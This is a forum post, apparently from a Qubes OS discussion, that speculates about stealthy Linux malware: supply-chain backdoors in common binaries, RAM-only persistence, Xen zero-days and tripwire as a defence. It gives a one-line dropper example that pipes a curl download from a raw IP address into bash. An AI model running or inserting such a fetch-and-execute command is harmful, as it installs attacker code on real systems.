Linux malware is typically nowhere that sophisticated.
Do you know that or do you believe that?
If I was an advanced adversary with unlimited resources
I would go for a supply chain attack against a popular binary like Network-Manager. Interesting point would be how to stay stealthy.
keeping everything in RAM and untraceable
So an attacker could plant a backdoor or a malware dropper in a popular binary to achieve persistence, but from there on stay in RAM only. A backdoor could even be something like exchanging a :
against a ;
(remember the ssh-disaster in 2008?) and a dropper could be a one liner like /usr/bin/curl -k https://38.147.122.82/script.sh | /bin/bash
.
To escalate privileges (we can sudo in every qube) towards dom0 we would need a zeroday for Xen.
So it broils down to the question does an advanced adversary have a Xen-zeroday-exploit.
Anyway, @unman mentioned installing tripwire
in dom0 in one of the forum-threads. I really enjoyed that idea. Still, I wouldn’t bet money on it when it comes to uefi- or firmware-malware.
We are all doomed! 